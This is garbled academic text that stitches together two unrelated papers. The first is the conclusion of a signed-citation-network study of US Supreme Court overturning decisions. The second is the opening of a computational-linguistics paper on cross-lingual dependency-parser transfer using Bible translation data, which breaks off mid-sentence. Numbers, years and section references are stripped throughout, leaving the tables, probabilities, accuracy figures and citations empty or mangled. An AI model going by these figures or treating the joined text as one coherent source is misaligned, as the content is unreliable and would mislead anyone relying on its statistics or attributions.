it appears that there was some confusion in the vinson court on these issues when it overturned itself. but, on closer inspection, when this court did this, it appears it was due to changes in its composition of justices, a topic worthy of further consideration. studying these three weak components of over- turning and overturned decisions made by this court shows the interplay between the substantive issues considered for specific decisions, the constitutional principles involved, the positions of justices regarding both, and the contexts within which overturning de- cisions are made. considering the phenomenon of overturning by the supreme court as a network, rather than focusing solely on dyadic ties, is merited. we now tackle a different topic in which the negative overturning links between supreme court de- cisions are placed in a more general network context. for this, we reconsider the notion of inconsistency that may exist when courts overrule their prior decisions. mobilizing ideas regarding inconsistencies when decisions are overturned figure displays three potentially inconsistent triples. the set of all possible decision triples are shown in figure . what are the counts of all these triples in the signed supreme court network? the triples in the top row are logically consistent while the triples in the bottom row are inconsistent. however, the one on the right of the lower panel is ambiguous. it suggests complete incoherence. for- tunately, as shown below, such triples do not exist in our data. table shows the distribution of the eight types of potential triples shown in figure . the method for doing this is described in doreian and mrvar ( ). figure : a five-vertex weak component. note: the decisions are labeled by the years they were made, and the notation used by the supreme court to identify specific decisions. the longest all negative path in these data featured the rehnquist court overturning a decision of the warren court which overturned a vinson court decision that over- turned one of its own decisions. connections given the overwhelming number of positive ties in this network, the large number of all positive triples is not a surprise. a surprise, at least to us, was the number of inconsistent triples in this network. the obvi- ous question is simple to state: is this distribution of triples types different from what would be expected by chance? this is an important issue. without mak- ing sure that this is not what would be expected by chance, all we have are simple descriptions. to tackle this issue, we propose two null models. one attempts to get directly at the expected dis- tribution of triple types under randomness. in this network, there were , decisions; , positive ties; and negative ties. the total number of ties is , . two probabilities can be defined. let p de- note the probability of a positive tie. from the data, p = , / , = . . similarly, letting n de- note the probability of a negative tie in this network, n = - p = . . the probability for the all positive figure : all possible triples between three supreme court decisions. table . counts of consistent and inconsistent triple types in the expanded signed network. consistent triples and triple counts inconsistent triples and triple counts all positive , one negative- type , two negative ties type one negative- type , two negative ties type one negative- type , two negative ties type all negative total , total , we are reporting these probabilities to four places of decimals. in all our calculations, we used ten places of decimals. signed networks for the supreme court citation network triple is p . the resulting probability is . . for each of the triples with two negative ties, the prob- ability is pn . the resulting probability for them is . . for each of the triples with one negative tie, the probability is p n, the value for which is . . using these probabilities, we get the expected values shown in table . defining χ for these distributions as Σ (o - e) /e, we get χ ( ) = , . which is far larger than any- thing reported in all available tables for this measure regarding significance. the observed distribution of triple types is very far from being random. our second approach toward establishing a random null model took a different tack. given the directed ties in the signed networks, we randomly selected arcs (their number in this network) and assigned them the value - . the rest were set to + . this experiment was repeated , times. the dis- tributions for all triple types were highly symmetric with the mean and median values of the distributions being very close. table shows the observed and “approximate” expected distributions for triple types using the medians from the generated distributions of the triple types. using the same definition for χ and applying it for ta- ble yields χ ( ) = , . . this value is also extremely significant. the observed distribution of the observed triad types is very far from being random. these results make it abundantly clear that the distribution of triple types cannot have come from random processes. the summary substantive details of comparing the observed distributions with those predicated in random processes are: . compared to a random distribution of signs of the network, empirically, there are far fewer observed all-positive directed triples even though they are so frequent in the observed network. this is a surprising and most non-ob- vious result. . compared to a random distribution of signs on the network, there are more observed imbal- anced triples of all three types when there was one negative tie . for a logically consistent and reasoned decision-making world, this must be viewed as very surprising. . compared to a random distribution of signs on the network, there are more observed balanced triples of types and . . compared to a random distribution of signs on the network, there are slightly fewer observed balanced triples of type . given the observed distribution of triple types, it became imperative to examine closely the distri- butions shown in table . these numbers can be assessed in several ways. if the measure of con- sistency is the proportion of consistent triples, it is . , suggesting that there is, overall, a high level of consistency. however, we think this is misleading as it is driven by the huge number of positive ties. if the all-positive triples (the left-most triple in the top row of figure ) are ignored, the overall meas- ure of consistency plummets to . , suggesting a very high level of inconsistency when overturning prior decisions is examined closely. at best, this is troubling and indicates that when the supreme court overturns prior decisions, the rationale for doing so is both selective and inconsistent. table . the first observed and expected distribution of ties in the signed network. triple type expected number, e observed number, o all positive , , two negative ties type two negative ties type two negative ties type one negative-type , one negative-type , one negative-type , all negative the all negative triple did not exist in either the observed world nor one in a world predicated by chance. connections empirical examples of the inconsistent triple types we include two additional figures produced from the signed network having both positive and negative ties. they serve two purposes. one is to show the exist- ence of inconsistent triples in a broader context. the other to examine what is involved by their presence, a topic returning us to the question we posed earlier: does the presence of inconsistent triples matter? in figure , there are eight inconsistent triples iden- tified as “one negative ” and two inconsistent triples identified as “one negative ,” as defined in figure . these inconstant triples exist. equally important, both of the overturning links in figure are instances of complete overturning of prior decisions – there is no need to deal with the issue of whether these decisions were overturned partially. yet, as shown in this figure, they still get cited despite having been overturned. we return to this issue in section “conclusions, a research agenda and a speculation about stare decesis.” the substantive issues of the decisions shown in figure deal with governmental personnel, or seaman, employed on us ocean going vessels sailing under the authority of admiralty law, a very complex legal domain. the decisions included whether com- pensation is due to men who were injured or killed on these vessels and how wages are paid (or not). most of the decisions were made by the vinson court. the overturning decision, us concerned a peruvian vessel that has been seized by the usa. this decision mandated the return of the vessel to peruvian com- pany owning it. more generally, admiralty law, known also as maritime law, is a large body of law, both na- tional and international, governing nautical issues and private maritime disputes. it deals with both domes- tic law on maritime activities, and private international law governing the relationships between private par- ties operating or using ocean going ships. the issues are remarkably complex. that there is confusion in dealing with them may not be too surprising. yet it is reasonable to expect the highest court in the usa would issue clear and consistent rulings. the second overturning decision shown in figure has us overturning us . the overturned decision held for an injured seaman, that he is entitled to sue the operating company for damages in a state court and to have a jury trial under section of the merchant marine act of ( known also as the jones act), even if he was technically an employee of the united states. the overturning decision declared: “a general agent employed by the united states under the terms of the war-time standard form of general agency agreement to manage certain phases of the business of a ship owned by the united states and operated by the war shipping administration is not liable under section of the mer- chant marine act of , known as the jones act, to a member of the crew of the ship who suffered physical injury through the negligence of its master and officers, when the injury occurred after march , , the date of enactment of the war shipping administration act, known as the clarification act (https://supreme.justia. com/cases/federal/us/ / /).” figure shows a set of decisions where there are instances of inconsistent triples identified as “one negative .” again, every overturning citation tie to an earlier decision overturned it completely. table . the expected distribution of triple types based on simulations and the observed distribution. triple type expected observed all positive , , two negative ties type two negative ties type two negative ties type one negative-type , one negative-type , one negative-type , all negative signed networks for the supreme court citation network figure : examples of two types of inconsistent signed triples. note: the decisions are labeled by the years they were made, and the notation used by the supreme court to identify specific decisions. figure : examples of the third type of inconsistent signed triples. note: the decisions are labeled by the years they were made, and the notation used by the supreme court to identify specific decisions. connections the substantive issue featured in the decisions shown in figure concern systematic efforts by election officials, especially in the south, to prevent african americans from voting through direct disen- franchisement and by using strategies such as poll taxes and literacy tests to prevent them from voting. there are four overturning decisions. the warren court decision, us , ruled explicitly that a virginia law allowing the use of poll taxes to prevent african americans from voting was unconstitutional. a decision by the burger court, us , ruled that a state law requiring residency requirements for black voters before they could vote was an unconstitutional infringement upon the right to vote and the right to travel. the decision, us , ruled that altering ballots made by black americans was totally uncon- stitutional and explicitly overruled us . the de- cision, us was more unusual in that it held that a ruling of a us district court, holding that a law au- thorizing the federal government to bring civil actions against state officials for discriminating against black citizens was unconstitutional. even so, it is clear that there had been a systematic effort to prevent minori- ties from voting, albeit with some ambiguity. as shown in table , there are , inconsist- ent signed triples. their presence is troubling as it suggests that in remaking law by overturning earlier precedents, the relevant issues are not thought through in a thorough fashion. conclusions, a research agenda and a speculation about stare decesis this paper introduced the idea of studying the citation network of ties between supreme court decisions in a new fashion by focusing on the court overturning some of its prior decisions. when this court does this, these overturning citation ties were defined as negative links between decisions in this citation network. an obvious question is simple to state: what is the nature and structure of these signed networks? we provided multiple descriptions and analyses to respond to this question. we asked how much overturning of prior decisions exists? we estab- lished a list of all decisions overturning prior decisions using multiple sources. we raised the issue of why prior decisions are overturned and offered some pro- visional answers regarding the mechanisms leading to overturning of precedent. the results in sections “mobilizing ideas regard- ing inconsistencies when decisions are overturned and empirical examples of the inconsistent triple types” suggest that new insights can be obtained by considering the overturning of prior decisions us- ing signed citation networks. more importantly, in our view, is whether this court overturning earlier decisions are made in a coherent and consistent fashion. our results show that, far too often, this was not the case. while the legal and political issues are important, it seems reasonable to expect the highest court in the land being capable of paying close attention to all of the legal issues involved when making its decisions. the presence of so many inconsistent triples is dis- turbing. it suggests a daunting research agenda with multiple components. first, all the weak components of the network with only the negative ties must be ex- amined to generate a more general understanding of the substantive issues and constitutional principles involved when earlier decisions are overturned and what are the rationales for rejecting precedent. second, it will be useful to separate the overturn- ing links according the chief justices of the supreme court over time. this implies two studies. one is a close examination of the overturning links between different courts. put differently, this amounts to unpacking the links shown in figure . the other is to study courts overturning themselves. third, it will be necessary to examine the voting alliances of justices when they reach decisions, especially regarding their legal phi- losophies and ideological positions. this needs to be done for each term of the court for which there is enough information. fourth, we need to understand why completely overturned decisions are still cited by subsequent decisions. there are far too many of them to be ignored. that completely overturned decisions are still cited suggests a level of logical inconsistency that cannot be accepted and calls into question the extent to which stare decisis is operative. putting together the findings that there are many, perhaps far too many, logically inconsistent signed triples, suggests that there is a major problem with the operation of the supreme court when it decides to overturn earlier decisions in ways that do not appear to consider the potential logical inconsisten- cies beyond the specific decisions being made. examining the distribution of the signed triples, as was done herein, along with the idea that many completely overturned decisions are cited by subse- quent decisions, raises questions about the nature of stare decesis. if a decision has been overturned completely, how is it still cited as legitimate prece- dent? it is reasonable to conjecture that, rather than being the bedrock of the us legal system, this al- leged respect for precedent may be nothing more than a convenient fiction. we finish with some speculations regarding stare decesis for the current roberts court following to signed networks for the supreme court citation network additions of justices gorsuch and kavanaugh to this body. marcus ( ), representing the federalist society, started in his new york times opinion piece by claiming “the confirmation of brett kavanaugh as an associate justice of the supreme court is a con- servative victory of generational proportions. it is the capstone of a decades long project to fundamentally change the judicial branch of the government in ways that can open heretofore locked doors on abortion, affirmative action, gun rights and religious free- dom (emphases added).” this reveals an intended goal of overruling earlier decisions in all these sub- stantive domains. if so, it implies a radical rejection of stare decisis. blow ( ), in another new york times opinion piece, noted “a much larger plan by conservatives to fundamentally change the american political structure so that it enshrines and protects white male power even after america’s changing demographics and mores move away from that power.” while written from very different perspectives, both opinion pieces agree on the intended scope of judicial changes envisioned by conservatives. given these assessments of their long-term goals, it is reasonable to predict that the number of overturning decisions made by the roberts court will increase, with stare decesis being rejected more often if the long-term goals of conservatives are re- alized. the rehnquist court had a fixed membership for terms from – through – . during this period, eight of the nine justices were in the majority more often than they were dissent- ing. the one exception was justice stevens. during this period, the number of – decisions was infre- quent despite the greater attention given to them in the press. one possible reason is that justices kennedy and o’connor were often seen as swing votes helping to moderate the supreme court deci- sions. there appears to be no such justices on the roberts court with two solid blocs of five justices nominated by republican presidents and four nomi- nated by democratic presidents. we predict that the number of – decisions will jump for the roberts court. the results reported here will help to provide a background for assessing this claim in a broader historical context. acknowledgments the authors appreciate the very helpful comments of the reviewers and the editor and their suggestions for the resulting revisions. references batagelj, v. and mrvar, a. . pajek – a program for large network analysis. connections ( ): – . batagelj, v. doreian, p. ferligoj, a. and n. kej žar, , understanding large temporal and spatial net- works and spatial networks: exploration, pattern searching and network evolution, wiley, chichester. blow, c. m. . liberals: this is war. new york times op-ed, october . a . brenner, s. and spaeth, h. j. . stare indeci- sis: the alteration of precedent on the supreme court, – , cambridge university press, cambridge. doreian, p. and mrvar, a. . identifying fragments in networks for structural balance and tracking the levels of balance over time. connections vol ( ): – . epstein, l., segal, j. a., spaeth, h. j. and walker, t. g. . the supreme court compendium: data, de- cisions and developments th ed., sage, los angeles. eskridge, w. n. jr. . overruling statutory prec- edents. faculty scholarship series. . https://digital- commons.law.yale.edu/fss_papers/ . fowler, j. h. and jeon, s. . the authority of us precedent. social networks ( ): – . gerhardt, m. j. . the power of precedent, oxford university press, oxford. government printing office. . supreme court deci- sions overruled by subsequent decision. available at: www. gpo.gov/fdsys/pkg/gpo-conan- /pdf/gpo-co- nan- - .pdf (accessed may , ). hall, k. l. (ed.), . the oxford guide to the supreme court of the united states, the oxford university press, new york, ny. irons, p. . a people’s history of the supreme court: the men and women whose cases and decisions have shaped our constitution, london: penguin. kleinberg, j. m. . authoritative sources in a hy- perlinked environment. proceedings of the acm-siam symposium on discrete algorithms: – . marcus, d. . conservatives are wrong to gloat about kavanaugh. new york times op-ed, october . a . powe, l. a. jr. . the supreme court and the american elite, harvard university press, cambridge, ma. root, d. . overruled: the long war for control of the us supreme court, palgrave macmillan, new york, ny. spaeth, h. j. and segal, j. a. . majority rule or minority will: adherence to precedent on the us supreme court, cambridge university press, cambridge. spriggs, j. f. ii and hansford, t. g. . explain- ing the overruling of us supreme court precedent. the journal of politics ( ) – . vile, j. r. . supreme court decisions: summaries of leading cases in us constitutional law th ed., row- man and littlefield, lanham. cross-lingual syntactic transfer with limited resources mohammad sadegh rasooli and michael collins∗ department of computer science, columbia university new york, ny , usa {rasooli,mcollins}@cs.columbia.edu abstract we describe a simple but effective method for cross-lingual syntactic transfer of depen- dency parsers, in the scenario where a large amount of translation data is not available. this method makes use of three steps: ) a method for deriving cross-lingual word clus- ters, which can then be used in a multilingual parser; ) a method for transferring lexical information from a target language to source language treebanks; ) a method for integrat- ing these steps with the density-driven annota- tion projection method of rasooli and collins ( ). experiments show improvements over the state-of-the-art in several languages used in previous work, in a setting where the only source of translation data is the bible, a con- siderably smaller corpus than the europarl corpus used in previous work. results using the europarl corpus as a source of translation data show additional improvements over the results of rasooli and collins ( ). we con- clude with results on datasets from the uni- versal dependencies corpora. introduction creating manually-annotated syntactic treebanks is an expensive and time consuming task. recently there has been a great deal of interest in cross-lingual syntactic transfer, where a parsing model is trained for some language of interest, using only treebanks in other languages. there is a clear motivation for this in building parsing models for languages for which treebank data is unavailable. methods ∗on leave at google inc. new york. for syntactic transfer include annotation projection methods (hwa et al., ; ganchev et al., ; mcdonald et al., ; ma and xia, ; rasooli and collins, ; lacroix et al., ; agić et al., ), learning of delexicalized models on univer- sal treebanks (zeman and resnik, ; mcdon- ald et al., ; täckström et al., ; rosa and zabokrtsky, ), treebank translation (tiedemann et al., ; tiedemann, ; tiedemann and agić, ) and methods that leverage cross-lingual rep- resentations of word clusters, embeddings or dictio- naries (täckström et al., ; durrett et al., ; duong et al., a; zhang and barzilay, ; xiao and guo, ; guo et al., ; guo et al., ; ammar et al., a). this paper considers the problem of cross-lingual syntactic transfer with limited resources of mono- lingual and translation data. specifically, we use the bible corpus of christodouloupoulos and steed- man ( ) as a source of translation data, and wikipedia as a source of monolingual data. we de- liberately limit ourselves to the use of bible trans- lation data because it is available for a very broad set of languages: the data from christodouloupou- los and steedman ( ) includes data from languages. the bible data contains a much smaller set of sentences (around , ) than other transla- tion corpora, for example europarl (koehn, ), which has around million sentences per language pair. this makes it a considerably more challeng- ing corpus to work with. similarly, our choice of wikipedia as the source of monolingual data is mo- tivated by the availability of wikipedia data in a very broad set of languages. transactions of the association for computational linguistics, vol. , pp. – , . action editor: yuji matsumoto. submission batch: / ; revision batch: / ; / ; published / . c© association for computational linguistics. distributed under a cc-by . license. we introduce a set of simple but effective methods for syntactic transfer, as follows: • we describe a method for deriving cross- lingual clusters, where words from different languages with a similar syntactic or seman- tic role are grouped in the same cluster. these clusters can then be used as features in a shift- reduce dependency parser. • we describe a method for transfer of lexical in- formation from the target language into source language treebanks, using word-to-word trans- lation dictionaries derived from parallel cor- pora. lexical features from the target language can then be integrated in parsing. • we describe a method that integrates the above two approaches with the density-driven ap- proach to annotation projection described by rasooli and collins ( ). experiments show that our model outperforms previous work on a set of european languages from the google universal treebank (mcdonald et al., ). we achieve . % average unlabeled at- tachment score (uas) on these languages; in com- parison the work of zhang and barzilay ( ), guo et al. ( ) and ammar et al. ( b) have a uas of . %, . % and . %, respectively. all of these previous works make use of the much larger europarl (koehn, ) corpus to derive lex- ical representations. when using europarl data in- stead of the bible, our approach gives . % accu- racy, a . % absolute improvement over rasooli and collins ( ). finally, we conduct experiments on datasets ( languages) in the universal depen- dencies v . (nivre et al., ) corpus. our method has an average unlabeled dependency accuracy of . % for these languages, more than % higher than the method of rasooli and collins ( ). thir- teen datasets ( languages) have accuracies higher than . %. background this section gives a description of the underlying parsing models used in our experiments, the data the parser code is available at https://github. com/rasoolims/yaraparser/tree/transfer. sets used, and a baseline approach based on delexi- calized parsing models. . the parsing model we assume that the parsing model is a discriminative linear model, where given a sentence x, and a set of candidate parses y(x), the output from the model is y∗(x) = arg max y∈y(x) θ ·φ(x,y) where θ ∈ rd is a parameter vector, and φ(x,y) is a feature vector for the pair (x,y). in our experi- ments we use the shift-reduce dependency parser of rasooli and tetreault ( ), which is an extension of the approach in zhang and nivre ( ). the parser is trained using the averaged structured per- ceptron (collins, ). we assume that the feature vector φ(x,y) is the concatenation of three feature vectors: • φ(p)(x,y) is an unlexicalized set of features. each such feature may depend on the part-of- speech (pos) tag of words in the sentence, but does not depend on the identity of individual words in the sentence. • φ(c)(x,y) is a set of cluster features. these fea- tures require access to a dictionary that maps each word in the sentence to an underlying cluster identity. clusters may, for example, be learned using the brown clustering algorithm (brown et al., ). the features may make use of cluster identities in combination with pos tags. • φ(l)(x,y) is a set of lexicalized features. each such feature may depend directly on word iden- tities in the sentence. these features may also depend on part-of-speech tags or cluster infor- mation, in conjunction with lexical informa- tion. appendix a has a complete description of the fea- tures used in our experiments. . data assumptions throughout this paper we will assume that we have m source languages l . . .lm, and a single tar- get language lm+ . we assume the following data sources: source language treebanks. we have a treebank ti for each language i ∈{ . . .m}. part-of-speech (pos) data. we have hand- annotated pos data for all languages l . . .lm+ . we assume that the data uses a universal pos set that is common across all languages. monolingual data. we have monolingual, raw text for each of the (m+ ) languages. we use di to refer to the monolingual data for the ith language. translation data. we have translation data for all language pairs. we use bi,j to refer to transla- tion data for the language pair (i,j) where i,j ∈ { . . . (m + )} and i = j. in our main experiments we use the google universal treebank (mcdonald et al., ) as our source language treebanks (this treebank pro- vides universal dependency relations and pos tags), wikipedia data as our monolingual data, and the bible from christodouloupoulos and steedman ( ) as the source of our translation data. in ad- ditional experiments we use the europarl corpus as a source of translation data, in order to measure the impact of using the smaller bible corpus. . a baseline approach: delexicalized parsers with self-training given the data assumption of a universal pos set, the feature vectors φ(p)(x,y) can be shared across languages. a simple approach is then to simply train a delexicalized parser using treebanks t . . .tm, us- ing the representation φ(x,y) = φ(p)(x,y) (see (mcdonald et al., ; täckström et al., )). our baseline approach makes use of a delexical- ized parser, with two refinements: wals properties. we use the six properties from the world atlas of language structures (wals) (dryer and haspelmath, ) to select a subset of closely related languages for each target language. these properties are shown in table . the model for a target language is trained on treebank data from languages where at least out of wals prop- erties are common between the source and target we also train our best performing model on the newly re- leased universal treebank v . (nivre et al., ). see § . for more details. feature description a order of subject and verb a order of object and verb a order of adposition and noun phrase a order of genitive and noun a order of adjective and noun a order of demonstrative and noun table : the six properties from the world atlas of lan- guage structures (wals) (dryer and haspelmath, ) used to select the source languages for each target lan- guage in our experiments. language. this gives a slightly stronger baseline. our experiments showed an improvement in aver- age labeled dependency accuracy for the languages from . % to . %. table shows the set of source languages used for each target language. these source languages are used for all experiments in the paper. self-training. we use self-training (mcclosky et al., ) to further improve parsing performance. specifically, we first train a delexicalized model on treebanks t . . .tm; then use the resulting model to parse a dataset tm+ that includes target-language sentences which have pos tags but do not have de- pendency structures. we finally use the automati- cally parsed data t ′m+ as the treebank data and re- train the model. this last model is trained using all features (unlexicalized, clusters, and lexicalized). self-training in this way gives an improvement in la- beled accuracy from . % to . %. . translation dictionaries our only use of the translation data bi,j for i,j ∈ { . . . (m + )} is to construct a translation dictio- nary t(w,i,j). here i and j are two languages, w is a word in language li, and the output w′ = t(w,i,j) is a word in language lj corresponding to the most frequent translation of w into this language. we define the function t(w,i,j) as follows: we first run the giza++ alignment process (och and ney, ) on the data bi,j. we then keep inter- sected alignments between sentences in the two lan- guages. finally, for each word w in li, we define there was no effort to optimize this choice; future work may consider more sophisticated sharing schemes. target sources en de, fr, pt, sv de en, fr, pt es fr, it, pt fr en, de, es, it, pt, sv it es, fr, pt pt en, de, es, fr, it, sv sv en, fr, pt table : the selected source languages for each target language in the google universal treebank v (mcdonald et al., ). a language is chosen as a source language if it has at least out of wals properties in common with the target language. w′ = t(w,i,j) to be the target language word most frequently aligned to w in the aligned data. if a word w is never seen aligned to a target language word w′, we define t(w,i,j) = null. our approach we now describe an approach that gives significant improvements over the baseline. § . describes a method for deriving cross-lingual clusters, allowing us to add cluster features φ(c)(x,y) to the model. § . describes a method for adding lexical features φ(l)(x,y) to the model. § . describes a method for integrating the approach with the density-driven ap- proach of rasooli and collins ( ). finally, § describes experiments. we show that each of the above steps leads to improvements in accuracy. . learning cross-lingual clusters we now describe a method for learning cross- lingual clusters. this follows previous work on cross-lingual clustering algorithms (täckström et al., ). a clustering is a function c(w) that maps each word w in a vocabulary to a cluster c(w) ∈ { . . .k}, where k is the number of clusters. a hi- erarchical clustering is a function c(w,l) that maps a word w together with an integer l to a cluster at level l in the hierarchy. as one example, the brown clustering algorithm (brown et al., ) gives a hi- erarchical clustering. the level l allows cluster fea- tures at different levels of granularity. a cross-lingual hierarchical clustering is a func- tion c(w,l) where the clusters are shared across the (m + ) languages of interest. that is, the word w inputs: ) monolingual texts di for i = . . . (m + ); ) a function t(w,i,j) that translates a word w ∈ li to w′ ∈lj ; and ) a parameter α such that < α < . algorithm: d = {} for i = to m + do for each sentence s ∈di do for p = to |s| do sample ā ∼ [ , ) if ā ≥ α then continue sample j ∼ unif{ , ...,m + }\{i} w′ = t(sp, i,j) if w′ = null then set sp = w′ d = d∪ {s} use the algorithm of stratos et al. ( ) on d to learn a clustering c. output: the clustering c. figure : an algorithm for learning a cross-lingual clus- tering. in our experiments we used the parameter value α = . . can be from any of the (m + ) languages. ideally, a cross-lingual clustering should put words across different languages which have a similar syntactic and/or semantic role in the same cluster. there is a clear motivation for cross-lingual clustering in the parsing context. we can use the cluster-based fea- tures φ(c)(x,y) on the source language treebanks t . . .tm, and these features will now generalize be- yond these treebanks to the target language lm+ . we learn a cross-lingual clustering by leverag- ing the monolingual data sets d . . .dm+ , together with the translation dictionaries t(w,i,j) learned from the translation data. figure shows the algo- rithm that learns a cross-lingual clustering. the al- gorithm first prepares a multilingual corpus, as fol- lows: for each sentence s in the monolingual data di, for each word in s, with probability α, we re- place the word with its translation into some ran- domly chosen language. once this data is created, we can easily obtain a cross-lingual clustering. fig- ure shows the complete algorithm. the intuition behind this method is that by creating the cross- lingual data in this way, we bias the clustering al- gorithm towards putting words that are translations of each other in the same cluster. . treebank lexicalization we now describe how to introduce lexical repre- sentations φ(l)(x,y) to the model. our approach is simple: we take the treebank data t . . .tm for the m source languages, together with the transla- tion lexicons t(w,i,m + ). for any word w in the source treebank data, we can look up its transla- tion t(w,i,m + ) in the lexicon, and add this trans- lated form to the underlying sentence. features can now consider lexical identities derived in this way. in many cases the resulting translation will be the null word, leading to the absence of lexical fea- tures. however, the representations φ(p)(x,y) and φ(c)(x,y) still apply in this case, so the model is ro- bust to some words having a null translation. . integration with the density-driven projection method of rasooli and collins ( ) in this section we describe a method for integrating our approach with the cross-lingual transfer method of rasooli and collins ( ), which makes use of density-driven projections. in annotation projection methods (hwa et al., ; mcdonald et al., ), it is assumed that we have translation data bi,j for a source and target language, and that we have a dependency parser in the source language li. the translation data con- sists of pairs (e,f) where e is a source language sentence, and f is a target language sentence. a method such as giza++ is used to derive an align- ment between the words in e and f, for each sen- tence pair; the source language parser is used to parse e. each dependency in e is then potentially transferred through the alignments to create a de- pendency in the target sentence f. once dependen- cies have been transferred in this way, a dependency parser can be trained on the dependencies in the tar- get language. the density-driven approach of rasooli and collins ( ) makes use of various definitions of “density” of the projected dependencies. for exam- ple, p is the set of projected structures where the projected dependencies form a full projective parse tree for the sentence; p is the set of projected structures where at least % of the words in the pro- jected structure are a modifier in some dependency. an iterative training process is used, where the pars- ing algorithm is first trained on the set t of com- plete structures, and where progressively less dense structures are introduced in learning. we integrate our approach with the density-driven approach of rasooli and collins ( ) as follows: consider the treebanks t . . .tm created using the lexicalization method of § . . we add all trees in these treebanks to the set p of full trees used to initialize the method of rasooli and collins ( ). in addition we make use of the representations φ(p),φ(c) and φ(l), throughout the learning process. experiments this section first describes the experimental settings, then reports results. . data and tools data in the first set of experiments, we consider european languages studied in several pieces of pre- vious work (ma and xia, ; zhang and barzi- lay, ; guo et al., ; ammar et al., a; lacroix et al., ). more specifically, we use the european languages in the google universal tree- bank (v. ; standard data) (mcdonald et al., ). as in previous work, gold part-of-speech tags are used for evaluation. we use the concatenation of the treebank training sentences, wikipedia data and the bible monolingual sentences as our monolingual raw text. table shows statistics for the monolin- gual data. we use the bible from christodouloupou- los and steedman ( ), which includes data for languages, as the source of translations. we also conduct experiments with the europarl data (both with the original set and a subset of it with the same size as the bible) to study the effects of translation data size and domain shift. the statistics for transla- tion data is shown in table . in a second set of experiments, we run experi- ments on datasets ( languages) in the more re- cent universal dependencies v . corpus (nivre et al., ). the full set of languages we use is listed in table . we use the bible as the translation data, we excluded languages that are not completely present in the bible of christodouloupoulos and steedman ( ) (an- and wikipedia as the monolingual text. the standard training, development and test set splits are used in all experiments. the development sets are used for analysis, given in § of this paper. lang. en de es fr it pt sv #sen. . . . . . . . #token . . . . . . . #type . . . . . . . table : sizes of the monolingual datasets for each of our languages. all numbers are in millions. brown clustering algorithm we use the off-the- shelf brown clustering tool (liang, ) to train monolingual brown clusters with clusters. the monolingual brown clusters are used as features over lexicalized values created in φ(l), and in self- training experiments. we train our cross-lingual clustering with the off-the-shelf-tool from stratos et al. ( ). we set the window size to with a cluster size of . parsing model we use the k-beam arc-eager de- pendency parser of rasooli and tetreault ( ), which is similar to the model of zhang and nivre ( ). we modify the parser such that it can use both monolingual and cross-lingual word clus- ter features. the parser is trained using the the max- imum violation update strategy (huang et al., ). we use three epochs of training for all experiments. we use the dependable tool (choi et al., ) to calculate significance tests on several of the com- parisons (details are given in the captions to tables , , and ). cient greek, basque, catalan, galician, gothic, irish, kazakh, latvian, old church slavonic, and tamil). we also excluded arabic, hebrew, japanese and chinese, as these languages have tokenization and/or morphological complexity that goes beyond the scope of this paper. future work should consider these lan- guages. https://github.com/percyliang/ brown-cluster https://github.com/karlstratos/singular usually the original brown clusters are better features for parsing but their training procedure does not scale well to large datasets. therefore we use the more efficient algorithm from stratos et al. ( ) on the larger cross-lingual datasets to obtain word clusters. data lang. en de es fr it pt sv bible tokens . m k k k k k k types k k k k k k k eu-s tokens k k k k k k k types k k k k k k k europarl tokens m m m m m m m types k k k k k k k table : statistics for the bible, sampled europarl (eu- s) and europarl datasets. each individual bible text file from christodouloupoulos and steedman ( ) consists of sentences, except for english datasets, where two translations into english are available, giving dou- ble the amount of data. each text file from the sampled europarl datasets consists of k sentences and europarl has approximately million sentences per language pair. l baseline this paper using the bible § . § . § . las uas las uas las uas las uas en . . . . . . . . de . . . . . . . . es . . . . . . . . fr . . . . . . . . it . . . . . . . . pt . . . . . . . . sv . . . . . . . . avg . . . . . . . . table : performance of different models in this paper; first the baseline model, then models trained using the methods described in sections § . – . . all results make use of the bible as a source of translation data. all differ- ences in uas and las are statistically significant with p < . using mcnemar’s test, with the exception of “de” uas/las baseline vs. . (i.e., . vs . uas and . vs . las are not significant differences). word alignment we use the intersected align- ments from giza++ (och and ney, ) on trans- lation data. we exclude sentences in translation data with more than words. . results on the google treebank table shows the dependency parsing accuracy for the baseline delexicalized approach, and for models which add ) cross-lingual clusters (§ . ); ) lexical features (§ . ); and ) integration with the density- driven method of rasooli and collins ( ). each of these three steps gives significant improvements in performance. the final las/uas of . / . % is several percentage points higher than the baseline accuracy of . / . %. lang. bible europarl-sample europarl density this paper density this paper density this paper las uas las uas las uas las uas las uas las uas en . . . . . . . . . . . . de . . . . . . . . . . . . es . . . . . . . . . . . . fr . . . . . . . . . . . . it . . . . . . . . . . . . pt . . . . . . . . . . . . sv . . . . . . . . . . . . avg . . . . . . . . . . . . table : results for our method using different sources of translation data. “density” refers to the method of rasooli and collins ( ); “this paper” gives results using the methods described in sections . – . of this paper. the “bible” experiments use the bible data of christodouloupoulos and steedman ( ). the “europarl” experiments use the europarl data of koehn ( ). the “europarl-sample” experiments use k randomly chosen sentences from europarl; this gives a similar number of sentences to the bible data. all differences in las and uas in this table between the density and “this paper” settings (i.e., for the bible, europarl-sample and europarl settings) are found to be statistically significant according to mcnemar’s sign test. lang. mx la zb gcy amb rc this paper supervised bible europarl uas uas las uas las uas las uas las uas las uas las uas en – – . . – – – – . . . . . . . . de . . . . . . . . . . . . . . . . es . . . . . . . . . . . . . . . . fr . . . . . . . . . . . . . . . . it . . . . . . . . . . . . . . . . pt . – . . . . . . . . . . . . . . sv . . . . . . . . . . . . . . . . avg\en . – . . . . . . . . . . . . . . table : comparison of our work using the bible and europarl data, with previous work: mx (ma and xia, ), la (lacroix et al., ), zb (zhang and barzilay, ), gcy (guo et al., ), amb (ammar et al., b), and rc (rasooli and collins, ). “supervised” refers to the performance of the parser trained on fully gold standard data in a supervised fashion (i.e. the practical upper-bound of our model). “avg\en” refers to the average accuracy for all datasets except english. comparison to the density-driven approach us- ing europarl data table shows accuracies for the density-driven approach of rasooli and collins ( ), first using europarl data and second using the bible alone (with no cross-lingual clusters or lex- icalization). the bible data is considerably smaller than europarl (around times smaller), and it can be seen that results using the bible are several per- centage points lower than the results for europarl ( . % uas vs. . % uas). integrating cluster- based and lexicalized features described in the cur- rent paper with the density-driven approach closes much of this gap in performance ( . % uas). thus we have demonstrated that we can get close to the performance of the europarl-based models using rasooli and collins ( ) do not report results on english. we use the same setting to obtain the english results. only the bible as a source of translation data. us- ing our approach on the full europarl data gives an average uas of . %, an improvement from the . % uas of rasooli and collins ( ). table also shows results when we use a random subset of the europarl data, in which the number of sentences ( , ) is chosen to give a very similar size to the bible. it can be seen that accuracies using the bible vs. the europarl-sample are very similar ( . % vs. . % uas), suggesting that the size of the translation corpus is much more important than the genre. comparison to other previous work table compares the accuracy of our method to the follow- ing related work: ) ma and xia ( ), who de- 